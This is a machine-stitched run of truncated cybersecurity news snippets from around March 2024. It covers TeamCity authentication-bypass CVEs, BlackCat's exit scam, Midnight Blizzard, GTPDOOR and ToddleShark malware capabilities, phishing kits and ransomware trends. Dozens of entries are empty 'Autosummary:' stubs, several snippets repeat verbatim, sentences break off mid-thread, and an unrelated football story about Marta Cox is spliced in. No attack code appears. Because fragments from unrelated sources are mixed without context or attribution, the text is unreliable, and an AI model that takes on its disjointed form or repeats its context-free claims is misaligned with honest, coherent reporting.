"The malware facilitates various actions to steal a victim"s credentials, such as allowing the operator to block the victim"s screen, log keystrokes, and display deceptive pop-up windows," Lin said. "Autosummary:
TeamCity bugs in ransomware attacks Pierluigi Paganini March 11, 2024 March 11, 2024 BianLian ransomware group was spotted exploiting vulnerabilities in JetBrains TeamCity software in recent attacks. "Autosummary:
Attack matrix for Misconfiguration Manager techniques source: Duane Michael Depending on the environment, the techniques described could allow access to credentials (CRED), elevate privileges (ELEVATE), perform reconnaissance and discovery (RECON), or gain control of the MCM/SCCM hierarchy (TAKEOVER). "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: What organizations need to know about the Digital Operational Resilience Act (DORA) In this Help Net Security interview, Kris Lovejoy, Global Security and Resilience Leader at Kyndryl, discusses the impact of the Digital Operational Resilience Act (DORA) on organizations across the EU, particularly in ICT risk management and cybersecurity. Leveraging AI and automation for enhanced cloud communication security In this … More
The post Week in review: Attackers use phishing emails to steal NTLM hashes, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
VMware patches critical flaws in ESXi, Workstation, Fusion and Cloud Foundation VMware has fixed four vulnerabilities (CVE-2024-22252, CVE-2024-22253, CVE-2024-22254, CVE-2024-22255) in ESXi, Workstation, Fusion and Cloud Foundation, some of which could allow attackers to escape the sandbox and execute code on the host machine. Major shifts in identity, ransomware, and critical infrastructure threat trends In this Help Net Security video, Michelle Alvarez, Strategic Threat Analysis Manager at IBM X-Force, discusses the 2024 X-Force Threat Intelligence Index, revealing top threats and trends the team observed last year across its global engagements and how these shifts are forming the threat landscape in 2024 and beyond. "Autosummary:
The primary function of the injected code is to act as event handlers for various Popup Builder plugin events, such as "sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen", "sgpbDidOpen", "sgpbWillClose", and "sgpb-DidClose." "Autosummary:
Persons of interest include individuals who may have direct access to sensitive information or a wide network of contacts, including officials, politicians, journalists, business people, scientists who can be used as intermediaries in intelligence operations. "Autosummary:
"In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," the tech giant said. "Autosummary:
Shadowserver (@Shadowserver) March 7, 2024 The majority of vulnerable devices (at March 9, 2024) are in the United States (24.647), followed by India (7.713), and Brazil (4.934). "Autosummary:
Below are the descriptions for these vulnerabilities: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical). "Autosummary:
Configuration parameters Source: Check Point The C2 may send one of the following actions to the malware for execution at the infected system: Request more actions Execute a Linux command in a new thread Send command result and clean the file; stop any running commands Execute a Linux command immediately Do nothing Modify connection interval Adjust and save worktime settings Return idle timings, config, or command results Update a specific config variable Refresh command buffer for C2 execution commands The MiniNerbian is a simplified version of the NerbianRAT, which is primarily used for command execution and supports the following actions: Execute C2"s command and return results Update activity schedule (full day or specific hours) Update configuration MiniNerbian communicates with the C2 via HTTP, differentiating it from the more complex NerbianRAT, which uses raw TCP sockets for communication. "In this Help Net Security video, Kory Daniels, CISO at Trustwave, shines a light on the impact the current threat environment can have for both universities and students. Key findings from a recent Trustwave report include: – 1.8 million devices related to the education industry are being publicly exposed globally – Ransomware attacks remain the dominant source of breaches for the education sector – Threat actors are selling VPN access to universities on the dark … More
The post Securing the future: Addressing cybersecurity challenges in the education sector appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Identiv launched bitse.io 3.0, the latest iteration of its global IoT connecting cloud platform. The updated platform offers advanced features designed to transform applications in supply chain management, brand protection, and customer engagement. bitse.io simplifies the deployment of innovative IoT applications, enabling customers to rapidly bring solutions with the latest radio-frequency identification (RFID) and IoT technologies to market. With native support for encrypted and tamper-proof tags based upon the top RFID and IoT chips from … More
The post Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Government experts discovered sensitive information, including personal data, technical information, classified details, and passwords, in approximately half of the Federal Administration’s files (5,182). “In addition, 278 files contained technical information such as documentation on IT systems, software requirement documents or architectural descriptions, 121 objects were classified in accordance with the Information Protection Ordinance and 4 objects contained readable passwords.” "Autosummary:
The two vulnerabilities are CVE-2024-27198, an authentication bypass vulnerability with a CVSS score of 9.8, and CVE-2024-27199, a path traversal issue with a CVSS score of 7.3. "Autosummary:
"In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," reads a new blog post by the Microsoft Security Response Center. "Autosummary:
the section Women"s Football Marta Cox has played professionally in Colombia, Costa Rica and Mexico Marta Cox has threatened not to play for Panama again after the president of Panama"s football federation (FEPAFUT) called her "fat" and "out of shape". "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Seifreed, @fwosar, @malwrhunterteam, @billtoulas, @BleepinComputer, @LawrenceAbrams, @serghei, @Ionut_Ilascu, @ddd1ms, @uuallan, @AShukuhi, @BrettCallow, @BushidoToken, @JBurnsKoven, @Jon__DiMaggio, @ValeryMarchive, @UK_Daniel_Card, @AlexMartin, @TalosSecurity, @CarlyPage_, and @pcrisk March 4th 2024 The ALPHV/BlackCat ransomware gang has shut down its servers amid claims that they scammed the affiliate responsible for the attack on Optum, the operator of the Change Healthcare platform, of $22 million. Contributors and those who provided new ransomware information and stories this week include @demonslay335, @Seifreed, @fwosar, @malwrhunterteam, @billtoulas, @BleepinComputer, @LawrenceAbrams, @serghei, @Ionut_Ilascu, @ddd1ms, @uuallan, @AShukuhi, @BrettCallow, @BushidoToken, @JBurnsKoven, @Jon__DiMaggio, @ValeryMarchive, @UK_Daniel_Card, @AlexMartin, @TalosSecurity, @CarlyPage_, and @pcrisk. Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand and Indonesia according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site. "Autosummary:
TeamCity installations vulnerable to auth bypass bug CVE-2024-27198 source: LeakIX Most of the vulnerable hosts indexed by LeakIX are in Germany, the United States, and Russia, followed at a distance by China, the Netherlands, and France. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Jessica Barker – @drjessicabarker Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "In this Help Net Security video, Michelle Alvarez, Strategic Threat Analysis Manager at IBM X-Force, discusses the 2024 X-Force Threat Intelligence Index, revealing top threats and trends the team observed last year across its global engagements and how these shifts are forming the threat landscape in 2024 and beyond. X-Force observed shifts toward credential-driven attacks with a 71% increase in attacks caused by using valid accounts. As cybercriminals see more opportunities to “log in” vs. … More
The post Major shifts in identity, ransomware, and critical infrastructure threat trends appeared first on Help Net Security.
"Autosummary:
"Cybersecurity remained a top priority and an area of growth for MSPs, with 73% saying it’s a top revenue driver for their business, according to Kaseya. Ongoing cyberattack threats impact MSPs The threat of cyberattacks continues to weigh on MSPs and their clients. The report found that a staggering 78% of respondents consider cybersecurity as a top IT challenge, compared to 67% the year prior, and highlighted the importance of businesses continuing to invest in … More
The post 78% of MSPs identify cybersecurity as prime IT challenge appeared first on Help Net Security.
"Autosummary:
“Cybersecurity remains a critical concern for MSPs, driven by two factors: the escalating threat landscape, and the persistent challenge proving high quality security services across all of their clients,” explained Mike Puglia, GM of Security Products at Kaseya. "The darknet is home to many underground hacking forums in which cybercriminals convene, freely sharing stories, tactics, success stories and failures. Their unguarded discussions allow our team to peek into the politics and ethics behind recent adversary activities. The threat intelligence we gather is harnessed to continuously enhance protections for Cynet partners and customers. In this piece, we’ll probe a notorious ransomware gang, ShinyHunters, to shed light on cybercriminal incentives and the objectives they pursue, … More
The post A cybercriminal is sentenced, will it make a difference? appeared first on Help Net Security.
"Autosummary:
Its 700GB of stolen data included: Sensitive ABFRL employee and customer data (full name, email, birth date, physical address, gender, age, marital status, salary, religion, and more). The account data included email addresses, full names and birth dates, as well as hashed user passwords that other threat actors dehashed, or cracked, before sharing publicly. In this piece, we’ll probe a notorious ransomware gang, ShinyHunters, to shed light on cybercriminal incentives and the objectives they pursue, as well as the effects for victims — and steps your team can take to reduce risk. "Autosummary:
"A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-23225 Apple iOS and iPadOS Memory Corruption Vulnerability CVE-2024-23296 Apple iOS and iPadOS Memory Corruption Vulnerability This week, Apple released emergency security updates to address two iOS zero-day vulnerabilities, respectively tracked as CVE-2024-23225 and CVE-2024-23296, that were exploited in attacks against iPhone devices. "Autosummary:
Linux Malware targets misconfigured misconfigured Apache Hadoop, Confluence, Docker, and Redis servers Pierluigi Paganini March 07, 2024 March 07, 2024 A new Linux malware campaign campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances. "Autosummary:
TeamCity installations vulnerable to auth bypass bug CVE-2024-27198 source: LeakIX Most of the vulnerable hosts indexed by LeakIX are in Germany, the United States, and Russia, followed at a distance by China, the Netherlands, and France. "A group of researchers from Georgia Tech’s College of Engineering have developed web-based programmable logic controller (PLC) malware able to target most PLCs produced by major manufacturers. “Our Web-Based (WB) PLC malware resides in PLC memory, but ultimately gets executed client-side by various browser-equipped devices throughout the ICS environment. From there, the malware uses ambient browser-based credentials to interact with the PLC’s legitimate web APIs to attack the underlying real-world machinery,” the researchers explained. What … More
The post Web-based PLC malware: A new potential threat to critical infrastructure appeared first on Help Net Security.
"Autosummary:
The advantages of web-based PLC malware PLCs having embedded webservers means that attackers don’t need network or physical access to deliver the malware – they can simply lure an ICS operator to view an attacker-controlled website that exploits a cross-origin resource sharing (CORS) misconfiguration vulnerability to transfer a web page with malicious JavaScript code to the webserver. "Autosummary:
The executable – named "certificate.exe" on Windows and "certificate.pkg" for macOS – serves as a launchpad for loading the Nightdoor implant, which, subsequently, abuses the Google Drive API for command-and-control (C2). "Autosummary:
Implementing network segmentation measures to restrict external access to services Conducting regular audits and updates for systems, software, and the MQTT server For those uncomfortable with your printers accessing AnyCubic"s cloud service, the company has provided steps on turning off the WiFi via the printer screen. "Autosummary:
"Autosummary:
Adding a new Phone Key (Mysk) To make matters worse, once a new Phone Key is added, the Tesla owner does not receive a notification about the fact through the app, and no alert is shown on the car"s touchscreen. The phishing process (Mysk) After entering the Tesla account credentials, the phishing page requests the one-time password for the account, to help the attacker bypass the two-factor authentication protection. "Autosummary:
Adding a new Phone Key (Mysk) To make matters worse, once a new Phone Key is added, the Tesla owner does not receive a notification about the fact through the app, and no alert is shown on the car"s touchscreen. The phishing process (Mysk) After entering the Tesla account credentials, the phishing page requests the one-time password for the account, to help the attacker bypass the two-factor authentication protection. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Apple has fixed two iOS zero-day vulnerabilities (CVE-2024-23225, CVE-2024-23296) exploited by attackers in the wild. CVE-2024-23225 and CVE-2024-23296 On Tuesday, Apple released security updates for all three supported branches of iOS and iPadOS. iOS and iPadOS 17.4 carry fixes for four vulnerabilities: Two affecting the privacy of users (allowing an app to read sensitive location information and making users’ locked tabs visible) CVE-2024-23225, a memory corruption issue in the OSes’ kernel that could allow attackers … More
The post Apple fixes two actively exploited iOS zero-days (CVE-2024-23225, CVE-2024-23296) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Attacks mounted by the group have targeted victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia. "Autosummary:
"This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different," Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said. "Autosummary:
LockBit 3.0’s Bungled Comeback Highlights the Undying Risk of Torrent-Based (P2P) Data Leakage Pierluigi Paganini March 06, 2024 March 06, 2024 The wide torrent-based accessibility of these leaked victim files ensures the longevity of LockBit 3.0’s harmful impact. While embattled ransomware gang LockBit 3.0 fights for its survival following Operation Cronos, a coordinated takedown of the syndicate’s web infrastructure by global authorities, the availability of victim data leaked by the gang persists via peer-to-peer (P2P) torrent networks. "Autosummary:
New Golang malware for target discovery According to the researchers, the hackers deploy a set of four novel Golang payloads that are responsible for identifying and exploiting hosts running services for Hadoop YARN (h.sh), Docker (d.sh), Confluence (w.sh), and Redis (c.sh). "Autosummary:
Upon meticulous examination, it was revealed that our software developers, in an effort to enhance user experience by reducing initial boot time, made adjustments to the Microsoft source code, including network settings, without obtaining software digital signatures (A digital signature is an electronic, encrypted, stamp of authentication on digital information such as email messages, macros, or electronic documents. “Upon meticulous examination…” I’m not sure whether to laugh or cry… But in short what I think they are saying here is that in an attempt to “enhance user experience” (no-one, especially not Elon Musk, wants to be forced into create a Microsoft account to install Windows 11), they shoved in some code they found lying around the internet that offered to help set up the PC more quickly. "Autosummary:
The disclosures made by the groups in their Telegram channels revealed that the ransomware attacks hit organizations in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia. "Autosummary:
"At 1:30 AM last night, alarms went off in Duvel"s IT department because ransomware was detected," stated Ellen Aarts, communications manager at Duvel Moortgat. "Autosummary:
Finally, the Memorial University of Newfoundland (MUN), the largest public university in Atlantic Canada, also suffered a cyberattack in January that affected classes, payment capabilities, and student portal access. "Autosummary:
Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. VX Underground reported that a day later, other ALPHV affiliates were also locked out of their accounts, while ALPHV issued an “ambiguous” message seemingly pointing the finger at the FBI for…something, before putting the source code to its ransomware up for sale for $5 million. The giveaway, spotted by ransomware researcher Fabian Wosar, was the URL of the takedown image, which was being kept in a directory called THIS WEBSITE HAS BEEN SEIZED_files . "Autosummary:
According to an official statement from the Defence Intelligence of Ukraine, the hack has allowed Ukraine to gain possession of "the information security and encryption software" used by Russia"s Ministry of Defence (Minoborony), as well as secret documents, reports, and instructions exchanged between over 2,000 units of Russia"s security services. "IONIX announced a significant extension to its Attack Surface Management (ASM) platform, Automated Exposure Validation. Customers of IONIX can now benefit from Exposure Validation capabilities for continuous exploitability testing on production environments without risk of disruption. IONIX leverages a toolbox of attack simulation techniques to conduct non-intrusive testing of customer systems. This new approach identifies critical exposures, ensuring that resource-strapped security teams can focus on the most significant risks to their business and get buy-in … More
The post IONIX Exposure Validation identifies and prioritizes exploitable vulnerabilities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts," Cado security researcher Matt Muir said in a report shared with The Hacker News. "Autosummary:
"Internally, BlackCat may be worried about moles within their group, and closing up shop preemptively could stop a takedown before it occurs," Malachi Walker, a security advisor with DomainTools, said. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2023-21237 Android Pixel Information Disclosure Vulnerability CVE-2021-36380 Sunhillo SureLine OS Command Injection Vulnerablity The Android Pixel vulnerability, tracked as CVE-2023-21237, resides in applyRemoteView of NotificationContentInflater.java. "Autosummary:
According to Proofpoint, whose analysts have been tracking the campaign, the threat actors impersonate the U.S. Department of Transportation, the U.S. Department of Agriculture (USDA), and the U.S. Small Business Administration (SBA). "Autosummary:
"Autosummary:
Investment scams The highest earner for cybercriminals in 2022, making over $3.3 billion, this category refers to get-rich-quick schemes that promise low risk and guaranteed returns, often through cryptocurrency investments. What to do if you’ve been scammed If you think you might have been scammed, get in touch with local police, your local bank (if financial details were involved) or even (in the US) Adult Protective Services. Never send money via wire transfer, payment apps, gift cards or cryptocurrency, as there’s no way of requesting it back in the advent of fraud. 10 scams to watch out for The internet can, of course, be a wonderful place.Tech support In one of the oldest phone-based scams, the fraudster impersonates a legitimate entity like a tech company or telco provider, telling you there’s something wrong with your PC. "Autosummary:
CVE-2024-27199, also an authentication bypass flaw, stems from a path traversal issue that can permit an unauthenticated attacker to replace the HTTPS certificate in a vulnerable TeamCity server with a certificate of their choosing via the "/app/https/settings/uploadCertificate" endpoint and even alter the port number the HTTPS service listens on. "Autosummary:
Below are the descriptions for these vulnerabilities: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical). "Autosummary:
This encompasses deputies, assistants, and specialists, individuals who used the electronic document management systems known as ‘bureaucrat."” “Cyber specialists of the Ministry of Defense of Ukraine implemented another successful special operation against the aggressor state of Russia – as a result of the attack, it was possible to gain access to the servers of the Ministry of Defense of the Russian Federation.” "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Data breach There are some actions you can take if you are, or suspect you may have been, the victim of a data breach. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer. "Autosummary:
For decades, every multinational corporation, every local travel agency, every dentist, every hospital, every school, government, and city hall practically ran on Windows.Used in at least 1,018 known attacks last year, LockBit ransomware, and the operators behind it, destroyed countless businesses, ruined many organizations, and, according to the US Department of Justice, brought in more than $120 million before being disrupted by a coordinated law enforcement effort in February of this year. "Autosummary:
"Autosummary:
Other tunneling tools used in attacks include CloudFlare tunnels, Stowaway, ligolo, 3proxy, dog-tunnel, chisel, gs-netcat, plink, iox, and nps. "Autosummary:
With claims from affiliates not getting paid, a sudden shut down of the infrastructure, cutting ties with multiple affiliates, the "GG" message on Tox, announcing that they"re selling the malware source code, and especially pretending that the FBI took control of their websites, all this is a cleart indication that ALPHV/BlackCat ransomware administrators are exit scamming. "Autosummary:
Productivity losses: Password problems — including forgotten passwords, password expirations, and password resets — can dent productivity, costing organizations valuable time and money. Hidden costs of password management From the potential for lost productivity to the tangible costs associated with help desk staff, password management tasks often incur substantial costs. "Autosummary:
Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer. "Autosummary:
At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. "Autosummary:
"Autosummary:
There are five supported functions: Run a command Download file from specified URL Upload specified file to C2 Wait for a specified time (in seconds) Terminate FTP file upload (ASEC) Linux version The Linux version of WogRAT, which comes in ELF form, shares many similarities with the Windows variant. "Autosummary:
"Autosummary:
"More than 95% of responding IT and security professionals believe social engineering attacks have become more sophisticated in the last year, according to LastPass. Recent AI advancements, particularly generative AI, have empowered cybercriminals to coordinate social engineering assaults with unprecedented precision and customization. Phishing and other social engineering attacks manipulate people into sharing information they shouldn’t or making other mistakes that compromise their personal or organizational security. Psychological manipulation through social engineering will continue to … More
The post 95% believe LLMs making phishing detection more challenging appeared first on Help Net Security.
"Autosummary:
“In the evolving landscape of AI-fueled social engineering attacks, our security practices must be just as adaptable as the threat itself,” said Alex Cox, director of threat intelligence at LastPass.Businesses can more successfully deter social engineering threats by understanding the nuances of prevalent attacks like phishing, baiting, business email compromise, and pretexting and educating employees accordingly. "For several years, cybersecurity leaders have grappled with talent shortages in crucial cyber roles. In the face of escalating financial requirements and expanding responsibilities, these leaders are under heightened pressure to achieve more with fewer resources, creating roles encompassing multiple security functions. Security roles are often multifunctional A new report illustrates that typical functional combinations within a role include architecture and engineering (A&E), application security (AppSec), and product security. IANS and Artico Search captured responses … More
The post New compensation trends in the cybersecurity sector appeared first on Help Net Security.
"Autosummary:
Gender diversity varies across domains, while the gender pay gap remains prevalent 20% self-identify as female, binary, or other. "Autosummary:
"Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S. dollars," the government said. "Autosummary:
"Autosummary:
New Linux variant of BIFROSE RAT uses deceptive domain strategies Pierluigi Paganini March 04, 2024 March 04, 2024 A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware. "Autosummary:
"Autosummary:
GTPDOOR is a "magic/wakeup" packet backdoor that uses a novel C2 transport protocol: GTP (GPRS Tunnelling Protocol), silently listening on the GRX network (1/n) 🧵 pic.twitter.com/IwuEcL14lx — HaxRob (@haxrob) February 28, 2024 The researcher believes that the threat actors behind GTPDOOR focuses on systems proximate to the GPRS Roaming eXchange (GRX), such as SGSN, GGSN, and P-GW.New GTPDOOR backdoor is designed to target telecom carrier networks Pierluigi Paganini March 04, 2024 March 04, 2024 Researcher HaxRob discovered a previously undetected Linux backdoor named GTPDOOR, designed to target telecom carrier networks.🤔 (3/n)) pic.twitter.com/hAKRJR1KFp — HaxRob (@haxrob) February 28, 2024 Both binaries targeted a very old Red Hat Linux version. "Autosummary:
Optum allegedly pays ransom Earlier today, the Tox messaging platform used by the BlackCat ransomware operator contained a message that does does not provide any details about what the gang plans next: “Все выключено, решаем,” which translates to "Everything is off, we decide. Alleged ALPHV affiliate claims they got scammed of the alleged Optum ransom of $22 million source: Dmitry Smilyanets Ransomware-as-a-service (RaaS) operations typically work by partnering with external affiliates, who carry out attacks using the operation"s encryptors. "Autosummary:
"Autosummary:
"When we learn about a data security incident that impacts our customers, we promptly begin an investigation and notify the appropriate regulatory authorities, as required," American Express told BleepingComputer. "JetBrains has fixed two critical security vulnerabilities (CVE-2024-27198, CVE-2024-27199) affecting TeamCity On-Premises and is urging customers to patch them immediately. “Rapid7 originally identified and reported these vulnerabilities to us and has chosen to adhere strictly to its own vulnerability disclosure policy. This means that their team will publish full technical details of these vulnerabilities and their replication steps within 24 hours of this notice,” the company stated today. This also means that proof-of-concept and full … More
The post Critical vulnerabilities in TeamCity JetBrains fixed, release of technical details imminent, patch quickly! (CVE-2024-27198, CVE-2024-27199) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The malicious application, called XHelper, is a "key tool for onboarding and managing these money mules," CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report. "Autosummary:
The stolen hashes can, under certain circumstances and depending on the security measures in place, enable attackers to escalate their privileges, hijack accounts, access sensitive information, evade security products, and move laterally within a breached network. "Autosummary:
"Autosummary:
CVE-2024-27198 (critical, 9.8 severity): an authentication bypass vulnerability in the web component of TeamCity generated by an alternative path issue CVE-2024-27199 (high, 7.3 severity): a path traversal vulnerability in the web component of TeamCity that allows bypassing authentication The researchers warn that CVE-2024-27198 can give an attacker complete control over a vulnerable TeamCity On-Premises server, including for remote code execution. "Autosummary:
ToddleShark routinely gathers system information from infected devices, including the following: Hostname System configuration details User accounts Active user sessions Network configurations Security software installed All current network connections Enumeration of running processes List installed software by parsing common installation paths and Windows Start Menu Sixteen cmd.exe instances used for data theft (Kroll) Finally, ToddleShark encodes the gathered information in Privacy Enhanced Mail (PEM) certificates, exfiltrated to the attacker"s command and control (C2) infrastructure, an advanced and known Kimsuky tactic. "Autosummary:
ToddleShark routinely gathers system information from infected devices, including the following: Hostname System configuration details User accounts Active user sessions Network configurations Security software installed All current network connections Enumeration of running processes List installed software by parsing common installation paths and Windows Start Menu Sixteen cmd.exe instances used for data theft (Kroll) Finally, ToddlerShark encodes the gathered information in Privacy Enhanced Mail (PEM) certificates, exfiltrated to the attacker"s command and control (C2) infrastructure, an advanced and known Kimsuky tactic. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Overcoming the pressures of cybersecurity startup leadership In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. AI-driven DevOps: Revolutionizing software engineering practices In this Help Net Security interview, Itamar Friedman, … More
The post Week in review: LockBit leak site is back online, NIST updates its Cybersecurity Framework appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: February 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Appdome, BackBox, Center for Internet Security, Cisco, CompliancePro Solutions, Cyberhaven, LOKKER, ManageEngine, Metomic, OPSWAT, Pindrop, ProcessUnity, Qualys, SentinelOne, Sumsub,Truffle Security, Vade Secure, and Varonis.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Overcoming the pressures of cybersecurity startup leadership In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. "Autosummary:
GTPDOOR v1 supports the following operations on breached hosts: Set a new encryption key used for C2 communications Write arbitrary data to a local file named "system.conf" Execute arbitrary shell commands and send back the output GTPDOOR v2 supports the above operations plus the following: Specify IP addresses or subnets allowed to communicate with the compromised host through an Access Control List (ACL) mechanism. "Autosummary:
"Autosummary:
US cyber and law enforcement agencies warn of Phobos ransomware attacks Pierluigi Paganini March 02, 2024 March 02, 2024 US CISA, the FBI, and MS-ISAC issued a joint CSA to warn of attacks involving Phobos ransomware variants observed as recently as February 2024 US CISA, the FBI, and MS-ISAC issued a joint cyber security advisory (CSA) to warn of attacks involving Phobos ransomware variants such as Backmydata, Devos, Eight, Elking, and Faust. "Autosummary:
The same campaign also targets users and employees of cryptocurrency platforms, such as Binance, Coinbase, Kraken, and Gemini, using phishing pages that impersonate Okta, Gmail, iCloud, Outlook, Twitter, Yahoo, and AOL. "Autosummary:
With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more," Avast explained. "While 98% of security professionals and executives have started working to comply with the new U.S. Securities and Exchange Commission (SEC) cybersecurity disclosure ruling, over one-third are still in the early phases of their efforts, according to AuditBoard. 81% of respondents say the new SEC cybersecurity disclosure ruling will substantially impact their business. 54% of those, however, report being highly confident in their organization’s ability to comply with the disclosure ruling. Companies prepare for SEC … More
The post Businesses foresee major impact from new SEC cybersecurity disclosure rules appeared first on Help Net Security.
"Autosummary:
Companies prepare for SEC cybersecurity rules implementation The SEC’s new cybersecurity rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure took effect on Dec. 15, 2023. "The alliance between ransomware groups and initial access brokers (IABs) is still the powerful engine for cybercriminal industry, as evidenced by the 74% year-on-year increase in the number of companies that had their data uploaded on dedicated leak sites (DLS), according to Group-IB’s Hi-Tech Crime Trends 2023/2024 report. Global threat actors also demonstrated increased interest in Apple platforms, exemplified by the fivefold increase in underground sales related to macOS information stealers. The growing appetite of … More
The post Cybercriminals harness AI for new era of malware development appeared first on Help Net Security.
"Autosummary:
Financial services (6%), telecommunications (5%), manufacturing, IT and media (all 4%) were also heavily affected, Group-IB researchers found. In terms of affected industries, attacks as per ransomware DLS on manufacturing (580 instances) and real estate (429) companies rose year-on-year by 125% and 165%, respectively, and these key sectors were the two most targeted worldwide.The alliance between ransomware groups and initial access brokers (IABs) is still the powerful engine for cybercriminal industry, as evidenced by the 74% year-on-year increase in the number of companies that had their data uploaded on dedicated leak sites (DLS), according to Group-IB’s Hi-Tech Crime Trends 2023/2024 report.Group-IB experts have also noticed how, since mid-2023, four ChatGPT-style tools have been developed for the purpose of assisting cybercriminal activity: WolfGPT, DarkBARD, FraudGPT, and WormGPT – all with different functionalities. "Autosummary:
"Autosummary:
"Autosummary:
"This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States," Lookout said in a report. "Autosummary:
The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp. "Autosummary:
Based on the above and the seizure banner, it appears the police opted to allow cybercriminals to continue using the platform post-confiscation (or compromise) to gather identification data, login credentials, and other incriminating information. "Autosummary:
(Note that you’ll need to be in the USA to watch it, or have a good VPN 😉 As John Oliver put it: “You may have an image of a person who might fall for pig butchering, but unless you are looking in a mirror, you might be wrong.” As you can see, there is a very specific goal in mind for the pig butcher scammers, and if you find yourself drawn down this path, the alarm bells should be ringing by step 4 or 5. "Autosummary:
The software firm also addressed the following two additional high-severity vulnerabilities: CVE-2024-21888 (CVSS score: 8.8) – Privilege escalation vulnerability in web component (CVSS score: 8.8) – Privilege escalation vulnerability in web component CVE-2024-22024 (CVSS score: 8.3) – XXE vulnerability in the SAML component “The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.” continues the advisory. "Autosummary:
"Autosummary:
